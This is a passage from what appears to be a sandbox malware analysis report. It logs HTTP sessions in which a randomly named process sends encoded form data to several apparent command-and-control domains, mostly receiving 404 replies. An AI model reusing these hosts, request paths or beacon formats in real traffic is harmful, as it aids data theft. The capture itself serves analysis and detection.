                                                                    Data Ascii: 1ZqD=YJER3XDDdqQ5CQ++hKA2kjXhQavdjImPSO/2oNX3BBSKwtrnuxvDQx+7LWJmBz40W+zjBXeX7+7a1vdRkWhEgV1g9V1lOYU41L4kX3iresns/4a97jBZ4XnMPzepyply6q4O3CmAd7PNouKEFJCa0gcje2VOOaiVkWHn3O/8rRbWTGc/RfQv/Zx7ZqyGGPXt2UnuRYQ=
                                                                    Jan 11, 2025 06:32:28.076931000 CET | 550 | IN | HTTP/1.1 404 Not Found
                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                    Content-Length: 282
                                                                    Accept-Ranges: bytes
                                                                    Date: Sat, 11 Jan 2025 05:55:42 GMT
                                                                    X-Varnish: 1719142264
                                                                    Age: 0
                                                                    Via: 1.1 varnish
                                                                    Connection: close
                                                                    X-Varnish-Cache: MISS
                                                                    Server: C2M Server v1.02
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 71 6a 38 79 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 37 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6e 67 6d 72 2e 78 79 7a 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /qj8y/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    10 | 192.168.2.8 | 49723 | 54.67.87.110 | 80 | 5220 | C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Jan 11, 2025 06:32:30.035326004 CET | 783 | OUT | POST /qj8y/ HTTP/1.1
                                                                    Host: www.ngmr.xyz
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Origin: http://www.ngmr.xyz
                                                                    Connection: close
                                                                    Content-Length: 225
                                                                    Cache-Control: max-age=0
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Referer: http://www.ngmr.xyz/qj8y/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                    Data Raw: 31 5a 71 44 3d 59 4a 45 52 33 58 44 44 64 71 51 35 41 77 4f 2b 75 4e 63 32 6f 54 58 6d 4a 71 76 64 78 49 6d 4c 53 4f 7a 32 6f 50 37 42 42 79 32 4b 78 4a 6a 6e 76 31 37 44 64 52 2b 37 41 32 4a 6a 63 44 34 2f 57 2b 32 57 42 53 2b 58 37 2b 48 61 31 74 56 52 6e 6c 35 4c 67 46 31 75 78 31 31 6e 54 6f 55 34 31 4c 34 6b 58 7a 4f 52 65 6f 7a 73 2f 4c 53 39 37 43 42 65 77 33 6e 4e 49 7a 65 70 32 70 6c 2b 36 71 34 38 33 47 47 6d 64 35 33 4e 6f 75 61 45 4c 36 61 5a 36 67 63 6c 44 6d 56 52 4a 37 62 4e 74 6e 53 43 70 39 6d 5a 6d 52 54 7a 53 77 78 56 4c 39 59 70 38 5a 5a 51 5a 70 61 77 44 34 4b 46 73 33 33 65 50 50 45 7a 7a 6b 78 31 57 67 42 5a 75 43 66 70 64 6d 76 57 53 33 53 4c
                                                                    Data Ascii: 1ZqD=YJER3XDDdqQ5AwO+uNc2oTXmJqvdxImLSOz2oP7BBy2KxJjnv17DdR+7A2JjcD4/W+2WBS+X7+Ha1tVRnl5LgF1ux11nToU41L4kXzOReozs/LS97CBew3nNIzep2pl+6q483GGmd53NouaEL6aZ6gclDmVRJ7bNtnSCp9mZmRTzSwxVL9Yp8ZZQZpawD4KFs33ePPEzzkx1WgBZuCfpdmvWS3SL
                                                                    Jan 11, 2025 06:32:30.615391970 CET | 550 | IN | HTTP/1.1 404 Not Found
                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                    Content-Length: 282
                                                                    Accept-Ranges: bytes
                                                                    Date: Sat, 11 Jan 2025 05:55:45 GMT
                                                                    X-Varnish: 1719142286
                                                                    Age: 0
                                                                    Via: 1.1 varnish
                                                                    Connection: close
                                                                    X-Varnish-Cache: MISS
                                                                    Server: C2M Server v1.02
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 71 6a 38 79 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 37 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6e 67 6d 72 2e 78 79 7a 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /qj8y/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    11 | 192.168.2.8 | 49724 | 54.67.87.110 | 80 | 5220 | C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Jan 11, 2025 06:32:32.584050894 CET | 1800 | OUT | POST /qj8y/ HTTP/1.1
                                                                    Host: www.ngmr.xyz
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Origin: http://www.ngmr.xyz
                                                                    Connection: close
                                                                    Content-Length: 1241
                                                                    Cache-Control: max-age=0
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Referer: http://www.ngmr.xyz/qj8y/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                    Data Raw: 31 5a 71 44 3d 59 4a 45 52 33 58 44 44 64 71 51 35 41 77 4f 2b 75 4e 63 32 6f 54 58 6d 4a 71 76 64 78 49 6d 4c 53 4f 7a 32 6f 50 37 42 42 79 2b 4b 77 37 37 6e 74 55 37 44 63 52 2b 37 4a 57 4a 69 63 44 34 2b 57 34 66 65 42 53 36 74 37 37 4c 61 30 4f 4e 52 69 55 35 4c 76 46 31 75 75 46 31 6d 4f 59 55 74 31 4c 49 6f 58 7a 2b 52 65 6f 7a 73 2f 4b 43 39 35 54 42 65 32 33 6e 4d 50 7a 65 74 79 70 6c 53 36 71 67 57 33 47 43 70 64 4e 44 4e 6f 50 71 45 47 6f 43 5a 79 67 63 6e 41 6d 55 45 4a 36 6e 73 74 6e 2f 39 70 2b 37 79 6d 53 7a 7a 65 57 77 4b 5a 39 59 6a 2b 62 64 2f 57 75 65 6c 64 4a 2f 70 68 57 4b 72 46 39 73 37 78 42 35 43 63 53 4a 34 76 7a 57 6b 4c 52 6e 6b 57 43 62 4c 67 48 34 38 59 68 6f 46 2b 53 41 38 37 79 30 31 35 50 31 56 56 50 4c 4f 61 71 73 48 51 73 47 53 6d 46 32 31 52 37 6e 74 67 46 41 79 65 46 6f 4c 49 73 70 4a 30 57 39 57 49 59 6f 70 47 4c 4c 69 55 61 71 73 31 38 6f 4b 34 66 42 52 74 78 57 4b 52 45 6a 42 39 35 48 50 72 53 38 54 55 67 48 68 51 54 44 41 76 52 59 53 37 6b 68 30 6b 31 34 41 61 [TRUNCATED]
                                                                    Data Ascii: 1ZqD=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 [TRUNCATED]
                                                                    Jan 11, 2025 06:32:33.174417019 CET | 550 | IN | HTTP/1.1 404 Not Found
                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                    Content-Length: 282
                                                                    Accept-Ranges: bytes
                                                                    Date: Sat, 11 Jan 2025 05:55:47 GMT
                                                                    X-Varnish: 1719142305
                                                                    Age: 0
                                                                    Via: 1.1 varnish
                                                                    Connection: close
                                                                    X-Varnish-Cache: MISS
                                                                    Server: C2M Server v1.02
                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /qj8y/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>


                                                                    Session ID: 12 | Source IP: 192.168.2.8 | Source Port: 49725 | Destination IP: 54.67.87.110 | Destination Port: 80 | PID: 5220 | Process: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Jan 11, 2025 06:32:35.133351088 CET | 510 | OUT | GET /qj8y/?dbFX6=JLnL0&1ZqD=VLsx0gmXQ4Y/FgugnqZTvhP9ZMzds9qWdo+Du/rvWhX0yMPY213bdk6OAmkXBQAvHZvuSU6Z1Lmt8KkEin8FkCRkth5DL64qsZwfe0mtTtD39/jv9X5U82qLTQbZ+JYXlg== HTTP/1.1
                                                                    Host: www.ngmr.xyz
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                    Jan 11, 2025 06:32:35.709069014 CET | 550 | IN | HTTP/1.1 404 Not Found
                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                    Content-Length: 282
                                                                    Accept-Ranges: bytes
                                                                    Date: Sat, 11 Jan 2025 05:55:50 GMT
                                                                    X-Varnish: 1719142311
                                                                    Age: 0
                                                                    Via: 1.1 varnish
                                                                    Connection: close
                                                                    X-Varnish-Cache: MISS
                                                                    Server: C2M Server v1.02
                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /qj8y/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>


                                                                    Session ID: 13 | Source IP: 192.168.2.8 | Source Port: 49726 | Destination IP: 35.156.117.131 | Destination Port: 80 | PID: 5220 | Process: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Jan 11, 2025 06:32:41.166868925 CET | 787 | OUT | POST /5x7s/ HTTP/1.1
                                                                    Host: www.specialgift.asia
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Origin: http://www.specialgift.asia
                                                                    Connection: close
                                                                    Content-Length: 205
                                                                    Cache-Control: max-age=0
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Referer: http://www.specialgift.asia/5x7s/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                    Data Ascii: 1ZqD=L5e2IY6NJDCnbNL/Dm5gypyo7PjAiAacT7xpXmTsevElO5Q0OOPxw/LW5WbBYXvQIxJRWi6EWFnroTGD/LcQDfxR76v4MzFX9c9UgUWiP8F+ChfoEx3OJTzqCDLhKuQvEiDSG0pmE1cTLj0KHJOdfQhRQLQpnV9iGrpw6JbULj7iJIcSVopFbqbM3QPzp8ePdGPP3xQ=
                                                                    Jan 11, 2025 06:32:42.302730083 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                    Server: openresty
                                                                    Date: Sat, 11 Jan 2025 05:32:42 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    Status: 404 Not Found
                                                                    X-Frame-Options: SAMEORIGIN
                                                                    X-XSS-Protection: 1; mode=block
                                                                    X-Content-Type-Options: nosniff
                                                                    Cache-Control: no-cache
                                                                    X-Request-Id: 5e9bfc8ea0ff8853fd2beccdb4380833
                                                                    X-Runtime: 0.061585
                                                                    Content-Encoding: gzip
                                                                    Data: [gzip-compressed body, chunked (first chunk size 0x412); not printable as text]
                                                                    Jan 11, 2025 06:32:42.302755117 CET | 246 | IN | [continuation of gzip-compressed body]


                                                                    Session ID: 14 | Source IP: 192.168.2.8 | Source Port: 49727 | Destination IP: 35.156.117.131 | Destination Port: 80 | PID: 5220 | Process: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Jan 11, 2025 06:32:43.709134102 CET | 807 | OUT | POST /5x7s/ HTTP/1.1
                                                                    Host: www.specialgift.asia
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Origin: http://www.specialgift.asia
                                                                    Connection: close
                                                                    Content-Length: 225
                                                                    Cache-Control: max-age=0
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Referer: http://www.specialgift.asia/5x7s/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                    Data Ascii: 1ZqD=L5e2IY6NJDCndoD/AFhg5py33vjArgaQT79pXjrCdcwlOb40PM3x9fLWy2bEHHvXIxNvWjGEWFzroXKD840TMvxfzav6CTFX9c9UgUyIP8d+CS3oWTfNKTz1VzLhHOQVEiC3G1lcE3UTLhcKGb2eUQhXerRNoFsoGK1HnZ3sDQj6M+x4PKhDYqzn3TnFsLDnHlf/pmFc8CUgf9kgqujnao9ZwiqR
                                                                    Jan 11, 2025 06:32:44.841963053 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                    Server: openresty
                                                                    Date: Sat, 11 Jan 2025 05:32:44 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    Status: 404 Not Found
                                                                    X-Frame-Options: SAMEORIGIN
                                                                    X-XSS-Protection: 1; mode=block
                                                                    X-Content-Type-Options: nosniff
                                                                    Cache-Control: no-cache
                                                                    X-Request-Id: 332091dbd504ab19ca6a74e331d4f33e
                                                                    X-Runtime: 0.025505
                                                                    Content-Encoding: gzip
                                                                    Data: [gzip-compressed body, chunked (first chunk size 0x412); not printable as text]
                                                                    Jan 11, 2025 06:32:44.842019081 CET | 246 | IN | [continuation of gzip-compressed body]


                                                                    Session ID: 15 | Source IP: 192.168.2.8 | Source Port: 49728 | Destination IP: 35.156.117.131 | Destination Port: 80 | PID: 5220 | Process: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Jan 11, 2025 06:32:46.257361889 CET | 1824 | OUT | POST /5x7s/ HTTP/1.1
                                                                    Host: www.specialgift.asia
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Origin: http://www.specialgift.asia
                                                                    Connection: close
                                                                    Content-Length: 1241
                                                                    Cache-Control: max-age=0
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Referer: http://www.specialgift.asia/5x7s/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                    Data Ascii: 1ZqD=[encoded form body omitted; 1241 bytes per Content-Length, truncated in the capture]
                                                                    Jan 11, 2025 06:32:47.458950996 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                    Server: openresty
                                                                    Date: Sat, 11 Jan 2025 05:32:47 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    Status: 404 Not Found
                                                                    X-Frame-Options: SAMEORIGIN
                                                                    X-XSS-Protection: 1; mode=block
                                                                    X-Content-Type-Options: nosniff
                                                                    Cache-Control: no-cache
                                                                    X-Request-Id: 4142429651ce0a3142f157486796473d
                                                                    X-Runtime: 0.043565
                                                                    Content-Encoding: gzip
                                                                    Data: [gzip-compressed body, chunked (first chunk size 0x412); not printable as text]
                                                                    Jan 11, 2025 06:32:47.458973885 CET | 246 | IN | [continuation of gzip-compressed body]


                                                                    Session ID: 16 | Source IP: 192.168.2.8 | Source Port: 49729 | Destination IP: 35.156.117.131 | Destination Port: 80 | PID: 5220 | Process: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Jan 11, 2025 06:32:48.798449039 CET | 518 | OUT | GET /5x7s/?1ZqD=G72WLubJMS3dcb26AEgi3aGXwYX/pSO4ef8LZR/GCsxFLMdiWd/rxNP93kykZnn+RGVOZz24Lnm2tnjD2KJLN51qk8LIdSpvhcJdwUuCC545HWD+B0z6B0HNWAHTPddxeA==&dbFX6=JLnL0 HTTP/1.1
                                                                    Host: www.specialgift.asia
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                    Jan 11, 2025 06:32:49.940907955 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                    Server: openresty
                                                                    Date: Sat, 11 Jan 2025 05:32:49 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Content-Length: 2088
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    Status: 404 Not Found
                                                                    X-Request-Id: 49fe5fcdb0b6c214c609b440749161a5
                                                                    X-Runtime: 0.039283
                                                                    Data Ascii: <html> <head> <title>Page not found - Strikingly</title> <meta id="viewport" name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0" /> <link href='https://fonts.googleapis.com/css?family=Montserrat|Open+Sans' rel='stylesheet' type='text/css'> <link href='//assets.strikingly.com/assets/404-styles.css' rel='stylesheet' type='text/css'> ...[if lte IE 7]> <style> .wide { padding-top: 160px; } </style> <![endif]--> <script type="text/javascript"> // Google Analytics (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','//www.google-analytics.com/analytics.js','ga'); ga('create', 'UA-25124444-6', 'auto'); ga('set', 'anonymizeIp
                                                                    Jan 11, 2025 06:32:49.940936089 CET | 224 | IN | Data Ascii: ', true); ga('send', 'pageview', { 'anonymizeIp': true }); // End Google Analytics </script> </head> <body> <div class='bg-logo'></div> <div class='wide light-text'> <div class='col2'>
                                                                    Jan 11, 2025 06:32:49.940949917 CET | 906 | IN | Data Ascii: <h1> PAGE NOT FOUND.</h1> <p>But if you're looking to build your own website, <br/>you've come to the right place.</p> <p class="buttons"> <a class='button dark-bg' href='https://www.strikingly.com/?utm_source=404&ut


                                                                    Session ID: 17 | Source IP: 192.168.2.8 | Source Port: 49730 | Destination IP: 161.97.142.144 | Destination Port: 80 | PID: 5220 | Process: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Jan 11, 2025 06:32:55.164902925 CET | 778 | OUT | POST /bw0u/ HTTP/1.1
                                                                    Host: www.030002803.xyz
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Origin: http://www.030002803.xyz
                                                                    Connection: close
                                                                    Content-Length: 205
                                                                    Cache-Control: max-age=0
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Referer: http://www.030002803.xyz/bw0u/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                    Data Raw: 31 5a 71 44 3d 64 76 6d 51 48 68 44 77 52 4a 35 54 72 57 67 51 62 74 2b 4d 64 57 66 46 6e 6f 61 50 74 79 31 54 4f 53 33 63 73 68 49 77 69 6a 36 69 48 6d 59 6c 6d 43 73 42 72 58 72 48 69 6e 6c 30 64 4c 34 33 56 47 67 4c 56 4d 72 66 69 37 78 39 4e 75 4d 35 4f 4a 5a 41 47 41 34 45 43 71 58 7a 49 4d 37 72 6c 6c 33 4e 38 46 66 55 55 6b 4d 39 2f 6f 45 54 43 52 6a 76 6b 54 7a 59 38 74 2f 74 6f 68 61 79 79 37 31 61 62 6e 4b 30 45 6e 77 48 6f 35 36 51 44 2f 52 71 4b 74 59 42 51 47 49 73 6d 6f 6a 39 72 34 4e 78 56 6b 4f 30 78 32 4b 4c 64 69 74 6c 77 59 6b 47 57 57 70 2b 68 39 62 32 65 4c 54 73 58 66 73 39 44 75 49 3d
                                                                    Data Ascii: 1ZqD=dvmQHhDwRJ5TrWgQbt+MdWfFnoaPty1TOS3cshIwij6iHmYlmCsBrXrHinl0dL43VGgLVMrfi7x9NuM5OJZAGA4ECqXzIM7rll3N8FfUUkM9/oETCRjvkTzY8t/tohayy71abnK0EnwHo56QD/RqKtYBQGIsmoj9r4NxVkO0x2KLditlwYkGWWp+h9b2eLTsXfs9DuI=
Jan 11, 2025 06:32:55.715848923 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                    Server: nginx
                                                                    Date: Sat, 11 Jan 2025 05:32:55 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    ETag: W/"66cce1df-b96"
                                                                    Content-Encoding: gzip
                                                                    Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                                                                    Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
Jan 11, 2025 06:32:55.715867996 CET | 370 | IN | Data Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                                                                    Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.8 | 49731 | 161.97.142.144 | 80 | 5220 | C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 06:32:57.899036884 CET | 798 | OUT | POST /bw0u/ HTTP/1.1
